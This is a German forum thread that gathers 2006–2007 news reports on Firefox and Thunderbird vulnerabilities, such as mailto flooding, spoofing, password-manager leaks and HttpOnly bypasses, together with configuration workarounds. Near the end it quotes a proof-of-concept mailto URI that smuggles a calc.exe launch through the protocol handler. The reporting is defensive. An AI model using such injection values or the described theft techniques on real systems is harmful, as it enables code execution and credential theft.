Als Workaround, also als Abhilfe gegen die Ausnutzung dieser Schwachstelle, kommen verschiedene Maßnahmen in Betracht. Sie können etwa Javascript komplett abschalten. Das hilft gegen viele Sicherheitslücken, führt jedoch zu Einschränkungen bei der Nutzung diverser Websites. Eine Alternative bietet die Firefox-Erweiterung " Noscript ", die Javascript nur auf bestimmten Seiten zulässt, die Sie selbst festlegen.
Sie können auch eine Warnung beim Aufruf von mailto-Links aktivieren. Dazu müssen Sie in der Adresszeile von Firefox "about:config" eintragen und aufrufen. Sie erhalten nun Zugriff auf eine Vielzhl von Konfigurationsoptionen, die nicht über "Extras, Einstellungen" erreichbar sind. Benutzen Sie das Eingabefeld "Filter" am oberen Rand und geben Sie dort "warn-external.mailto" ein. Als einzige Option bleibt dann "network.protocol-handler.warn-external.mailto" stehen, der Wert steht standardmäßig auf "false". Durch Anklicken mit der rechten Maustaste und Auswählen von "Umschalten" setzen Sie ihn auf "true".
Nun werden Sie beim Anklicken eines Mail-Links auf einer Web-Seite jedesmal gefragt, ob Sie den Aufruf des Mail-Programms erlauben wollen. Das führt bei dem oben genannten Exploit zwar dazu, dass Sie ziemlich viele solcher Bestätigungsdialoge erhalten. Es werden jedoch keine Mail-Fenster geöffnet und der Rechner bleibt benutzbar.
Noch radikaler ist die Maßnahme, mailto-Links gänzlich abzuschalten. Dazu geben Sie im Filterfeld bei about:config "external.mailto" ein. Sie erhalten die Option "network.protocol-handler.external.mailto", die Sie wie oben von "false" auf "true" umschalten. Ab dann passiert beim Anklicken eines mailto-Links gar nichts mehr.
Beide Optionen können Sie auf die gleiche Weise auch wieder zurück setzen.
Quelle : www.pcwelt.de
-
Ein Problem mit der aktuellen und früheren Version von Firefox macht derzeit von sich reden. Zahlreiche Verweise von Image-Source-Tags auf eine mailto-URI veranlassen das System, die mit Mail verknüpfte Anwendung beim Besuch einer Webseite ohne Nutzerinteraktion zu öffnen. Normalerweise sollte <img src=> einen Pfad zu einem Bild enthalten – eine mailto: hat dort eigentlich nichts zu suchen.
Ein bereits kursierender Exploit macht genau dies und ruft das Tag per JavaScript gleich 100-mal auf, sodass sich ebenso viele Thunderbird- oder Outlook-Fensterchen öffnen. Dass dies das System aus dem Tritt bringen kann, liegt nahe. Unter Umständen wird das System dadurch unbenutzbar. Bei einem Test der heise-Security-Redaktion verabschiedete sich allerdings nur Thunderbird nach dem hundertsten Fenster mit einer Fehlermeldungen – der Windows-XP-PC mit nur 256 MByte Speicher lief anschließend stabil weiter.
Wer kein Risiko eingehen will, schaltet in Firefox das automatische Öffnen der Mail-Anwendung einfach ab. In der Adressleiste gibt man dazu about:config ein und stellt die Option warn-external.mailto auf true. Allerdings muss der Anwender dann 100-mal den Dialog wegklicken. Alternativ lässt sich der Aufruf von Mail-Programm durch Firefox abstellen, indem man network.protocol-handler.external.mailto auf false setzt.
Siehe dazu auch:
* Confirmed bug in Firefox 1.5.0.3, Bericht auf Securityreview
Quelle und Links : http://www.heise.de/security/news/meldung/73109
-
Die Mozilla Foundation hat neue Versionen ihres Browsers und ihres Mail-Clients für Windows, Linux und Mac OS X veröffentlicht, in der mehrere kritischen Sicherheitslücken beseitigt sind. Ein Angreifer konnte darüber die Kontrolle über den Rechner übernehmen. Dazu genügt bereits der Besuch einer manipulierten Webseite oder das Öffnen einer bösartigen Mail. Die Aktualisierungen werden bereits über das automatische Update verteilt.
In Firefox 2.0.0.1 sind insgesamt acht Lücken geschlossen, fünf davon stufen die Entwickler als kritisch ein. Dazu gehören unter anderem ein Speicherzugriffsfehler beim Verarbeiten von SVG-Comment-Objects (Scalable Vector Graphics), über den sich Code einschleusen und ausführen lassen soll. Nicht ganz so einfach soll sich nach Einschätzung des Fehlerberichts der Mozilla-Foundation ein Fehler im LiveConnect-Code ausnutzen lassen, der die Kommunikation zwischen JavaScript und Java Applets ermöglicht. In der Regel stürze der Browser bei einem Angriff nur ab, man schließe aber nicht aus, dass mit einiger Anstrengung auch Codeausführung möglich ist. Da Thunderbird standardmäßig keine Applets lädt, kann das Problem dort eigentlich nicht auftreten – dennoch ist der fehlerhafte Code auch dort enthalten.
Zudem können Angreifer über die JavaScript-Methode watch() zum Beobachten von Werten in Skripten einen Rechner mit Schadcode infizieren. Genauere Angaben macht die Mozilla Foundation nicht, auf allen Bugzilla-Einträgen zu den Fehlern liegt während der "aktiven Update-Periode" noch ein Embargo. Teilweise veröffentlichen aber die Entdecker der Lücken bereits ihre eigenen Fehlerberichte.
Ein Heap Overflow tritt zudem bei der Umwandlung von präparierten Bildern in Windows-Bitmaps auf. Dazu müssen aber laut Bericht zusätzlich die Eigenschaften des CSS-Cursors in einer Seite manipuliert werden. Von dem Fehler ist nur die Windows-Version von Firefox betroffen.
Darüberhinus wurde die Stabilität der Browser verbessert, sodass weniger Abstürze auftreten sollen. Da einige dieser Abstürze Hinweise auf Speicherlecks lieferten, über die Angreifer eventuell Code in der Speicher schreiben und anspringen können, hat man dieses Problem ebenfalls als kritisch eingestuft.
Schlußendlich wurden noch zwei Cross-Site-Scripting-Schwachstellen (XSS) beseitigt und ein Problem mit RSS-Feeds behoben. Eine der XSS-Lücken findet sich nur in Firefox 2.0.0.1, die anderen Lücken wurden auch in Firefox 1.5.0.9 und Thunderbird 1.5.0.9 nur sieben Lücken beseitigt sind. In SeaMonkey 1.0.7 sind die Fehler ebenfalls ausgemerzt. Für Firefox 2.0.0.1 erwähnen die Entwickler explizit, dass nun auch Windows Vista unterstützt wird – allerdings noch mit einigen Problemen; so sind etwa einige Maßnahmen zu beachten für das automatische Update, auch kann Firefox noch nicht zum Default-Webbrowser unter Vista gemacht werden. Die Entwickler erwähnen zudem zwar in den Release-Notes für Thunderbird 1.5.0.9 den Fehler mit teilweise unaufgefordert gelöschten Mails nicht, laut dem Eintrag in Bugzilla wurde der Fehler aber mit der Version 1.5.0.9 korrigiert.
Firefox 2.0.0.1 und 1.5.0.9 sowie Thunderbird 1.5.0.9 stehen in diversen Landessprachen, darunter Deutsch, über die Downloadseiten von Mozilla bereit, werden aber auch über das Software-Update der Anwendungen verteilt. Firefox 1.0.x und Thunderbird 1.0.x werden nicht mehr unterstützt, sodass die Fehler dort nicht mehr behoben werden. Anwender sollten auf die aktuellen Releases wechseln.
Siehe dazu auch:
* Known Vulnerabilities in Mozilla Products, Fehlerberichte der Mozilla Foundation
Quelle und Links : http://www.heise.de/security/news/meldung/82789
-
Der Open-Source-Webbrowser Firefox hat Probleme mit seinem Schutz gegen Phishing und unerwünschte Pop-ups. So erkennt Firefox bis einschließlich der aktuellen Version 2.0.0.1 registrierte Phishing-URLs nicht mehr, wenn zusätzliche Schrägstriche als Verzeichnistrenner eingestreut sind, wie beispielsweise in www.heise.de///ct. Auf diese Weise ist es möglich, den Phishing-Schutz zu umgehen und URLs auf der Blacklist für eine neuen Phishing-Welle zu reaktivieren. In der Mozilla-Fehlerdatenbank ist dieses Problem zwar derzeit als behoben markiert, es ist jedoch nicht klar ersichtlich, ob das bedeutet, dass das Verhalten des Open-Source-Browsers geändert wird.
Eine mögliche Schwachstelle im Pop-up-Blocker will Michal Zalewski in Firefox 1.5.0.9 entdeckt haben. Sie erlaubt Angreifern möglicherweise, beliebige lokale Dateien auszulesen. Dazu muss sich laut Zalewski ein Angreifer die Tatsache zunutze machen, dass Firefox zum Download angebotene Dateien auch ohne Nutzerrückfragen herunterlädt und in einem temporären Verzeichnis abspeichert. Zugriffe auf lokale Dateien über den file://-Namensraum ist für Webseiten im Internet zwar verboten, doch ein lokal gespeicherter JavaScript-Code darf auch auf lokale Dateien zugreifen.
Zalewski schildert folgendes Angriffsszenario: Schickt eine manipulierte Webseite nach dem Klick auf ihre URL zunächst die HTML-Datei mit dem JavaScript-Code und einen Sekundenbruchteil später ein Pop-up, zeigt es Firefox an, weil Pop-ups als direkte Reaktion auf Nutzereingaben in der Standardeinstellung erlaubt sind. Dabei überdeckt das Pop-up den Download-Dialog, und die HTML-Datei landet ohne weitere Nutzerinteraktion zunächst unter einem Zufallsnamen im temporären Verzeichnis. In dem Pop-up-Fenster wird der Anwender darauf hingewiesen, dass für die ordentliche Funktionsweise der Webseite ein nachfolgendes Pop-up erlaubt werden müsse.
Das zweite Pop-up, dem der Anwender zustimmen muss, kann auf die lokal gespeicherte HTML-Datei mit dem Skript-Code verweisen, sofern ihr Zufallsname im temporären Verzeichnis vorhersagbar ist. Da der von Firefox verwendete Zufallszahlengenerator allerdings mit der aktuellen Uhrzeit initialisiert wird, lässt sich der erzeugte Dateiname laut Zalewski mit hinreichender Zuverlässigkeit vorhersagen. Ob das Ganze auch in der Praxis funktioniert, ist derzeit noch unklar; ein Demo-Exploit existiert bislang offenbar noch nicht.
Siehe dazu auch:
* Firefox + popup blocker + XMLHttpRequest + srand() = oops von Michal Zalewski
* Firefox Phishing Protection Bypass Vulnerability (Multiple /) von Kanedaaa
* Bug 367538 – Firefox 2.0.0.1 Phishing Protection bypass in der Mozilla-Fehlerdatenbank
Quelle und Links : http://www.heise.de/security/news/meldung/85003
-
Michal Zalewski hat eine Lücke in Firefox 2 und wahrscheinlich auch älteren Versionen entdeckt, die Angreifern Cross-Site-Scripting-Attacken ermöglicht. Das Problem entsteht dadurch, dass die location.hostname-Eigenschaft des Document Object Model (DOM) im Open-Source-Browser nicht mit NULL-terminierten Zeichenketten arbeitet. Dadurch stellt sich für Firefox in boeseseite.com\x00www.beispiel.de boeseseite.com als Subdomain von www.beispiel.de dar; der DNS-Eintrag löst jedoch wegen der NULL-terminierten Zeichenkette nach boeseseite.com auf.
Dadurch können Angreifer dann etwa Cookies von www.beispiel.de stehlen oder manipulieren. Auch die Eigenschaft document.domain können Angreifer so manipulieren und dadurch auf Inhalte anderer Frames zugreifen. Zalewski stellt eine Webseite bereit, die die Schwachstelle demonstriert. Die Entwickler diskutieren die Lücke in einem Eintrag im Bugzilla-System. Dort steht zu lesen, dass der Angriff nicht funktioniert, wenn Anwender in der Konfigurationsdatei den Eintrag
user_pref("capability.policy.default.Location.hostname.set", "noAccess");
ergänzen.
Abhilfe in Form eines Software-Updates gibt es bislang noch nicht. Allerdings wollen die Entwickler in Kürze Version 2.0.0.2 freigeben. In der bislang aktuellen Entwicklerversion 2.0.0.2 RC2 haben sie den Fehler jedoch noch nicht behoben.
Siehe dazu auch:
* Firefox: serious cookie stealing / same-domain bypass vulnerability, Sicherheitsmeldung von Michal Zalewski
* Demonstration der Sicherheitslücke von Zalewski
* Eintrag im Bugzilla-System von Mozilla
Quelle und Links : http://www.heise.de/security/news/meldung/85351
-
Phisher können einen Designfehler im Firefox-Browser ausnutzen, um vor Anwendern die wahre Herkunft einer Seite zu verschleiern. Auf diese Weise lassen sich etwa äußerst täuschend echte gemachte Seiten von Banken, eBay, PayPal und anderen Dienstleistern ins Netz stellen (Spoofing). Der Spezialist für Browsersicherheit Michal Zalewski hat zur Demonstration eine Seite zur Verfügung gestellt, auf der Interessierte das Problem nachvollziehen können. Die Demo funktioniert mit Firefox 1.5 und 2.0.
Laut Zalewski liegt das Problem im Umgang des Firefox mit der URL about:blank, die eine leere Seite öffnet. Dabei zeigt der Browser weder eine URL in der Adresszeile, noch eine Information in der Titelzeile des Fensters an. Auch JavaScripte können solch eine Seite öffnen. Allerdings lassen sich über diverse JavaScript-Funktion weitere Inhalte in die Seite einbauen. Zwar ist dies für Fenster, die aus unterschiedlichen Domains stammen, normalerweise nicht möglich. Da aber about:blank gar keiner Domain zugeordnet und die document.location nicht definiert ist, funktioniert es trotzdem. Auch ein nach Angaben von Zalewski älterer Spoofing-Fehler lässt sich in Firefox so wieder erneut ausnutzen.
Abhilfe dürfte derzeit nur das Abschalten von JavaScript oder der Einsatz des FF-Plug-ins NoScript bringen, das Scripting nur auf bekannten vertrauenswürdigen Seiten erlaubt
Siehe dazu auch:
* Firefox about:blank spoofing demos, Schwachstellenbeschreibung von Michal Zaleeski -> http://lcamtuf.coredump.cx/ffblank/
Quelle : www.heise.de
-
Portable Firefox liegt ab sofort in Version 2.0.0.3 vor. Die wesentliche Neuerung: Der Firefox für unterwegs hat nach dem Update die gleiche Versionsnummer wie der Standard-Firefox. Damit wurden im Firefox nicht nur einige kleinere Fehler beseitigt, sondern auch eine Sicherheitslücke geschlossen.
Portable Firefox ist eine Variante des bekannten Firefox-Browers, der sich unabhängig vom PC von mobilen Speichermedien wie einem USB-Stick starten lässt. Jetzt steht Portable Firefox in Version 2.0.0.3 zum Download bereit. Damit kommen Benutzer dieser mobilen Firefox-Version in den Genuss der gleichen Verbesserungen, wie es sie für den Standard-Firefox schon länger gibt : Ein Sicherheits-Update , verbesserte Kompatibilität zu einigen Websites und die üblichen Bugfixes.
Zusätzlich wurden für Portable Firefox 2.0.0.3 einige Standardeinstellungen geändert und der Launcher erweitert.
http://portableapps.com/apps/internet/firefox_portable
Quelle : www.pcwelt.de
-
Die Mozilla-Entwickler haben zahlreiche Sicherheitslücken in den Open-Source-Programmen Firefox, Thunderbird und Seamonkey geschlossen. Die Lücken erlaubten Angreifern, Schadcode einzuschleusen, Cross-Site-Scripting-Angriffe auszuführen oder Teile des Anwendungsfensters mit fremden Inhalten zu überlagern.
Die Entwickler haben unter anderem an der Stabilität der Programme geschraubt. Die dabei behobenen Fehler in der Layout- und JavaScript-Engine, die Abstürze verursachten, konnten teilweise zum Einschleusen von fremdem Programmcode dienen. Die JavaScript-Funktion addEventListener konnten Angreifer missbrauchen, um die browserseitige Prüfung auf die gleiche Ursprungs-Domain zu umgehen und so Skript-Code aus anderen Domains in die aktuelle Seite injizieren.
In Thunderbird konnten die Anmeldedaten für Mailserver, die mit der verschlüsselten APOP-Authentifizierung geschützt waren, leichter geknackt werden, da das Programm das Protokoll nicht strikt genug umgesetzt hat. Elemente in der Beschreibungssprache für die Optik und das Layout der Mozilla-Programme XUL konnten bösartige Individuen so platzieren, dass sie Bereiche außerhalb der eigentlichen Inhaltsanzeige lagen, also etwa über der Adressleiste im Browser.
Außerdem haben die Mozilla-Entwickler eine fehlende Längeprüfung für Pfadangaben für Cookies nachgerüstet. Angreifer konnten dadurch große Mengen an Speicherplatz belegen und möglicherweise einen Denial-of-Service provozieren. Durch eine fehlende Prüfung auf das intern verwendete Trennzeichen zwischen den Werten für den Cookie-Pfad und den Feldnamen konnten etwa gekaperte, unsichere Webserver fälschlicherweise sichere Cookies schreiben.
Die Fehler betreffen die Programmversionen vor den jetzt herausgegebenen Fassungen Firefox 2.0.0.4 und 1.5.0.12, Thunderbird 2.0.0.4 und 1.5.0.12 sowie Seamonkey 1.1.2 und 1.0.9. Da Angreifer in den Vorgängerversionen möglicherweise Schadcode einschleusen können, sollten Mozilla-Nutzer das Update so bald wie möglich einspielen. Für Firefox wird bereits ein automatisches Update angeboten, in Kürze dürften auch die Aktualisierungen für Thunderbird und Seamonkey automatisch verteilt werden.
Firefox 1.5.0.12 soll die letzte unterstützte 1.5er Version sein. Die Entwickler wollen "in wenigen Wochen" ein automatisches Update auf die 2er-Version des Browsers anbieten.
Siehe dazu auch:
* Known Vulnerabilities in Mozilla Products, Auflistung der geschlossenen Sicherheitslücken von den Mozilla-Entwicklern
* Crashes with evidence of memory corruption, Fehlermeldung der Mozilla-Entwickler
* XSS using addEventListener, Sicherheitsmeldung der Mozilla-Entwickler
* Security Vulnerability in APOP Authentication, Fehlerbericht der Mozilla-Entwickler
* Path Abuse in Cookies, Fehlermeldung der Mozilla-Entwickler
* XUL Popup Spoofing, Scherheitsmeldung der Mozilla-Entwickler
Quelle und Links : http://www.heise.de/security/news/meldung/90407
-
Der Student Christopher Soghoian warnt vor den Firefox-Erweiterungen von Firmen wie Google, Yahoo und AOL, die nicht über die Mozilla Add-ons-Seite ausgeliefert werden. In den allermeisten Fällen nutzen die nämlich für ihre Tests auf neue Updates und deren Download ungesicherte Verbindungen. Hat ein möglicher Angreifer Zugriff auf das verwendete Netz – beispielsweise in einem öffentlichen Funknetz – kann er diese Verbindungen recht einfach so umleiten, dass der Browser ohne Wissen des Anwenders eine Hintertür herunterlädt und dann installiert.
Als prominentes Beispiel führt Soghoian das beliebte Google Pack beziehungsweise die Google Toolbar an. Die meisten kleineren Erweiterungen sind hingegen nicht betroffen, da deren Entwickler meist die von Mozilla bereitgestellte Infrastruktur nutzen, die auf SSL-gesicherte Verbindungen aufsetzt. Die in Firefox/Mozilla implementierten Mechanismen für das Signieren von Code sind bislang ziemlich unterentwickelt und werden wohl auch deshalb praktisch nicht genutzt.
Soghoian hat neben dem Mozilla-Entwicklerteam auch viele große Firmen vor 45 Tagen auf dieses Problem aufmerksam gemacht. Für die Firefox/Ebay -Erweiterung hat das Mozilla-Team innerhalb von zwei Tagen eine überarbeitete Version bereitgestellt. Weitere Reaktionen sind bislang nicht dokumentiert.
Um sich zu schützen, sollten Anwender die betroffenen Erweiterungen zumindest beim Surfen in unsicheren Netzen vorübergehend deaktivieren. Festzustellen, welche Erweiterungen tatsächlich betroffen sind, dürfte im Einzelfall aber nicht ganz einfach sein, im Zweifelsfall sind es alle, die nicht von den offiziellen Mozilla/Firefox-Seiten stammen. Das Mozilla-Team sieht zwar die Verantwortung bei den jeweiligen Herstellern, denkt aber darüber nach, den Update-Mechanismus für Firefox 3 zu überarbeiten.
Siehe dazu auch:
* A Remote Vulnerability in Firefox Extensions von Christopher Soghoian -> http://www.heise.de/security/news/meldung/90440
-
Die Mozilla-Entwickler haben das Update 2.0.0.5 für ihren Web-Browser Firefox bereitgestellt. Er ist über die automatische Update-Funktion verfügbar, steht aber auch für Windows, Mac OS X und Linux in diversen Sprachen zum Download bereit. Firefox-Nutzern wird empfohlen, ihren Web-Browser schnellstmöglich zu aktualisieren.
Neue Funktionen hat das Update nicht zu bieten. Es beseitigt anscheinend unter anderem die kürzlich bekannt gewordene Sicherheitslücke, die sich durch ein trickreiches Zusammenspiel mit Microsofts Internet Explorer auftut. Zumindest die Demonstrationsseite von Thor Larholm funktionierte bei einem Test von heise Security nach der Installation des Updates nicht mehr.
In der Liste der beseitigten Schwachstellen ist das aktuelle Firefox-Update noch nicht aufgeführt. Kurz nach Bekanntwerden der Sicherheitslücke im Zusammenspiel mit dem Internet Explorer war aber bereits die Rede davon, dass sie noch in diesem Monat mit der Version 2.0.0.5 beseitigt werden soll – die Sicherheitsmeldungen für das 2.0.0.5er-Release scheinen derzeit aber noch in der Vorbereitung zu sein. Die Meldungen für die Firefox-Version 2.0.0.4 reichten bis MFSA-2007-17. Jetzt reichen die Advisories bis MFSA-2007-25; sie enthalten zwar bislang nur Dummy-Einträge, aber auch den Hinweis "Fixed in: Firefox 2.0.0.5". Insgesamt schließen die Entwickler daher wahrscheinlich acht Sicherheitslücken mit der neuen Browser-Version.
[Update]:
Mittlerweile haben die Entwickler die Informationen über die korrigierten Sicherheitslücken freigeschaltet. Tatsächlich werden acht Lecks gestopft, darunter die bereits angesprochene Lücke im Zusammenspiel mit dem Internet Explorer. Auch das Sicherheitsproblem beim Zugriff auf wyciwyg://-URIs, das am Wochenende bekannt wurde und für Spoofing genutzt werden konnte, ist behoben. Außerdem wurden als schwerwiegende Fehler unter anderem Bugs behoben, die zu Abstürzen mit der Möglichkeit führten, Code einzuschleusen, und ein Leck geschlossen, mit dem über den Event-Handler eine Rechteausweitung gelang.
Quelle und Links : http://www.heise.de/security/news/meldung/92864
-
Die Mozilla-Entwickler haben ein bekanntes Loch im Passwort Manager von Firefox & Co gestopft – und doch ein Tor für Missbrauch offen gelassen. Der eingebaute Passwort Manager des Open Source Browsers speichert auf Wunsch des Benutzers Passwörter und füllt die entsprechenden Formularfelder beim nächsten Besuch dann automatisch aus. Dies geschieht nicht nur auf der Seite, auf der man das Passwort gespeichert hat, sondern auch auf jeder anderen Seite auf diesem Server, die ein ähnliches Formular enthält.
Dürfen Anwender auf einem Server eigene Webseiten erstellen, wie das beispielsweise bei vielen Community-Sites der Fall ist, kann ein Angreifer das Login-Formular nachbauen und sich die automatisch eingesetzten Zugangsdaten auf seinen eigenen Server schicken lassen. Dazu konnte er früher ein Login-Formular sogar so gestalten, dass es die Daten beim Klick auf "Anmelden" direkt auf seinen eigenen Server überträgt. Trotzdem setzte Firefox die Daten automatisch ein. Das haben die Entwickler mittlerweile geändert. Sie überprüfen jetzt das Ziel der Übertragung, mit dem Resultat, dass die Demo von heise Security nicht mehr funktionierte. Einem Leser fiel jedoch auf, dass man das Ziel der Formularübertragung gar nicht ändern muss, sondern man die automatisch eingesetzten Daten via JavaScript auslesen und dann verschicken kann. Dazu muss die Seite lediglich via DOM (document.<form>.<field>.value) darauf zugreifen. Die aktualisierte Browsercheck-Seite von heise Security/UK demonstriert dies.
Von heise Security befragt, bestätigte Mozilla-Entwickler Gavin Sharp, dass man sich des Problems bewusst sei. In der Tat hat man es bereits in der Fehlerdatenbank kontrovers diskutiert und weitergehende Maßnahmen verworfen. Das automatische Einsetzen von Passwörtern auf anderen Seiten erhöhe den Komfort auf Sites, die mehrere Login-Seiten enthalten. Und selbst wenn man diese Funktion entferne, sei die Gefahr des Passwortdiebstahls nicht gebannt. Denn sobald ein Angreifer Script-Code auf einem Server platzieren kann, sei er ohnehin in der Lage, die Seiten nach seinem Gusto zu manipulieren und dem Anwender Zugangsdaten abzuluchsen.
Die Argumentation der Mozilla-Entwickler ist durchaus nachvollziehbar, verlässt sich das Sicherheitsmodell von JavaScript doch nahezu vollständig auf die Herkunft des Codes (Same Origin Policy). Wenn es einem Angreifer gelingt, seinen "bösen" Code auf einem Server zu platzieren, kann er im Browser des Anwenders alle Seiten dieses Servers nahezu beliebig manipulieren. Es bleibt dennoch ein flaues Gefühl, wenn ein Passwort Manager ganz ohne User-Interaktion Passwörter in gefälschte Formulare einträgt. Das erinnert doch sehr an eine Geldbörse mit einem Loch.
Aus Anwendersicht heißt das auf alle Fälle, dass man dem Passwort Manager sein Passwort nicht anvertrauen darf, wenn eine Web-Site es anderen Usern erlaubt, eigene Seiten mit Script-Code zu erstellen. Sonst könnte jemand ganz einfach eine Seite basteln, die schon beim Öffnen heimlich das Passwort klaut. Zu dieser Kategorie von Sites gehören beispielsweise viele Content Management Systeme. Daran ändern auch spezielle Filterfunktionen wenig, die versuchen, zwischen gutem und bösem Code zu unterscheiden. Denn sie lassen sich erfahrungsgemäß meist irgendwie umgehen. Alternativ kann man JavaScript abschalten oder mit Erweiterungen wie NoScript reglementieren, was jedoch gerade im Zeitalter von Web 2.0 dazu führt, dass viele Seiten gar nicht mehr funktionieren. Ob hingegen der völlige Verzicht auf einen Passwort-Manager die Sicherheit letztlich erhöht, darf ebenfalls bezweifelt werden. Denn dies führt häufig dazu, dass Passwörter aus Bequemlichkeit zu einfach gewählt und oft wiederverwendet werden.
Quelle : www.heise.de
-
Seit Version 2.0.0.5 verfügt der Open-Source-Webbrowser Firefox über eine Sicherheitsfunktion, die es Angreifern erschweren soll, mittels JavaScript Cookies bestimmter Seiten zu kopieren und sich damit unter falscher Flagge anzumelden. So genannte HttpOnly-Cookies lassen sich nicht mehr durch JavaScript auslesen, sodass beispielsweise Cross-Site-Scripting-Attacken, die die JavaScript-Methode document.cookie nutzen, nicht mehr funktionieren.
Ursprünglich untertützte nur der Internet Explorer seit Version 6 SP1 die Erweiterung des Cookie-Formats um dieses Attribut (Set-Cookie: VAL=023; expires=Tuesday, 24-Jul-07 23:12:40 GMT; httpOnly). Bis dato setzen aber nur wenige Seiten aus Kompatiblitätsgründen HttpOnly-Cookies. Für Tests auf dem eigenen Server reicht etwa unter PHP folgender Code-Schnippsel:
<?php
header("Set-Cookie: hidden=value; httpOnly");
?>
<html>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
Bei Aufruf des Skripts bleibt die Alert-Box leer.
Leider lässt sich diese Sicherheitsfunktion mit Tricks aushebeln, die Amit Klein zwar bereits Anfang 2003 in einem Posting auf Bugtraq beschrieben hat, die aber erst jetzt auf breiteres Interesse stoßen. Mit der JavaScript-Methode XMLHTTPRequest lassen sich die zu übertragenden Cookies im HTTP-Header direkt auslesen – ganz ohne document.cookie. Voraussetzung bleibt aber weiterhin, dass eine Seite ein XSS-Lücke aufweist, damit ein Angreifer eigenen JavaScript-Code in den Browser des Anwenders schleusen und starten kann. Eine Demo dazu findet sich auf ha.ckers.org.
Siehe dazu auch:
* XS(T) attack variants which can, in some cases, eliminate the need for TRACE, Fehlerbericht von Amit Klein
* Round-up: Ways to bypass HttpOnly (and HTTP Basic auth), Fehlerbericht von Amit Klein
Quelle und Links : http://www.heise.de/security/news/meldung/93178
-
Das Hickhack zwischen Microsoft und der Mozilla-Foundation um registrierte Protokoll-Handler und die daraus resultierenden Sicherheitsprobleme geht weiter. So wurde eine neue Demo veröffentlicht, die zeigt, wie die aktuelle Firefox-Version unter Windows XP SP2 über präparierte Links zum Starten einer Anwendung missbraucht werden kann. Dabei öffnet sich beim Klick auf einen manipulierten mailto:-, nntp:-, snews:- oder news-Link die Eingabeaufforderung und der Windows-Taschenrechner startet. Prinzipiell ließe sich so jeder beliebige Befehl ausführen und Code über eine Webseite einschleusen und starten.
Damit die neue Demo funktioniert, muss allerdings der Internet Explorer 7 installiert sein. Ist nur der Internet Explorer 6 installiert, öffnet sich nur der Standard-Mailclient Outlook Express. Welche Rolle der Internet Explorer 7 dabei spielt, ist nicht ganz klar. Nach seiner Installation ändert sich jedoch offenbar die Art, wie Windows eine URI verarbeitet. Das zeigt sich auch daran, was pssiert, wenn man den "bösen" Link über "Ausführen" im Startmenü direkt an die Windows Shell übergibt. Mit IE6 startet Outlook Express, mit IE7 cmd.exe und der Taschenrechner.
Dem dazugehörigen Bugzilla-Eintrag zufolge ist ein Grund für die neue Lücke, dass Windows XP URIs mit der Zeichenfolge %00 falsch interpretiert. In der Folge wird statt des URL-Protokoll-Handlers der Filetype-Handler mit der kompletten URL aufgerufen, worüber es dann offenbar möglich ist, weitere Programme mit eigenen Argumenten aufzurufen. Um das Problem zu entschärfen, wollen die Firefox-Entwickler nun Links mit Nullbytes (%00) nicht mehr zu öffnen. Ein enstprechender Patch ist bereits in die Entwicklerversion eingepflegt. Einen praktikablen Workaround bis zum Erscheinen eines neuen offizellen Firefox-Release gibt es nicht.
Auch bei dieser Lücke dürfte die Schuldfrage wieder für heiße Diskussionen sorgen. Bei der letzten Cross-Browser-Lücke reichte der Internet Explorer präparierte URLs an Firefox weiter. Damals wies das IE-Team alle Verantwortung von sich und konstatierte: Es ist die Verantwortung der empfangenden (aufgerufenen) Applikation, sicher zu stellen, dass sie die übergebenen Parameter korrekt behandeln kann. Dem zu Folge wäre nun eigentlich weniger Mozilla als Microsoft unter Zugzwang, das gefährliche Verhalten abzustellen.
Die Autoren der Demo weisen darauf hin, dass es noch viele weitere Beispiele für derartige Lücken über registrierte URIs gäbe. Derzeit sei nur die Spitze des Eisberge zu sehen. Registrierte URIs seien so etwas wie ein Remote Gateway in den eigenen Rechner. Anwender sollten nach Meinung der Autoren sicherheitshalber alle unnötigen URIs deregistrieren – ohne allerdings darauf einzugehen, welche nun überflüssig sind.
Bei der Suche danach soll das Windows-Scripting-Host-Tool "Dump URL Handlers" helfen, dass die Registry durchforstet und alle registrierte URIs nebst zugehöriger Anwendung anzeigt. Auch die Autoren der Exploits haben das Tool nach Angaben des Programmierers für ihre Fehlersuche verwendet.
Quelle : www.heise.de
-
Bei der Einschätzung, wer der eigentliche Verursacher aus der im Zusammenspiel von Firefox und Internet Explorer 7 resultierenden Lücke ist, gehen die Meinungen auseinander. Das US-CERT macht Firefox als den Schuldigen aus, da er übernommene Links nicht filtere, bevor er sie an den dafür registrierten URI-Protokoll-Handler weitergibt. Als Workaround schlägt das US-CERT vor, einen Warndialog im Firefox zu aktivieren, der den Anwender beim Aufruf etwa einer mailto-URI benachrichtigt und die Möglichkeit zum Abbruch gibt. Um die Konfigurationsseite aufzurufen, gibt man in der Adresszeile des Firefox about:config ein. Anschließend sind die Optionen:
network.protocol-handler.warn-external-default
network.protocol-handler.warn-external.mailto
network.protocol-handler.warn-external.news
network.protocol-handler.warn-external.nntp
network.protocol-handler.warn-external.snews
auf true zu setzen.
Auch das französische FrSIRT meldet auf seinen Seiten einen Fehler in Firefox beziehungsweise Mozilla und Netscape. Der Dienstleister macht ebenfalls die fehlende Filterung im Browser der Mozilla-Foundation bei der Übergabe der URIs für das Problem verantwortlich.
Einzig Secunia ist nach selbst angestellten Analysen der Meinung, dass der Fehler in Windows zu finden sei. Zudem hat Secunia herausgefunden, dass eine präparierte URI nicht die Zeichenfolge %00 enthalten muss, es genügt, wenn nur ein Prozentzeichen dort zu finden ist. So startet auf Windows XP mit Internet Explorer 7 ein Klick in Firefox auf
mailto:test%../../../../windows/system32/calc.exe".cmd
den Taschenrechner. Demzufolge wäre der von den Firefox-Entwicklern erstellte Patch wirkungslos, da er nach %00 in URIs sucht, um sie zu blockieren.
Quelle : www.heise.de
-
Der Grund-Tenor ist schon richtig, dass, wer Daten von anderen Anwendungen zu übernehmen bereit ist, sich selbst um eine notwendige Filterung zu kümmern hat.
Das entlastet allerdings den IE keinesfalls, es sei denn, eine zweite Instanz dessen würde ganauso reagieren.
Grundsätzlich halte ich es für keine gute Idee, zwei Browser in Reihe zu schalten, weil sich damit die Sicherheits-Lücken und -Denkfehler beider multiplizieren.
Und es ist nicht davon auszugehen, dass das M$ wirklich stört...
Also sollte man sich konsequenterweise für die Nutzung eines einzigen Browsers entscheiden, sofern das irgend geht.
Den IE kann man ja immer noch mit den Dingen beschäftigen, die er halbwegs hinkriegt oder nur selbst darf, Explorer-Erweiterung, Windoze-Update, Windoof-Hilfe, Active-eXploit, klei-mi-an-mors...
-
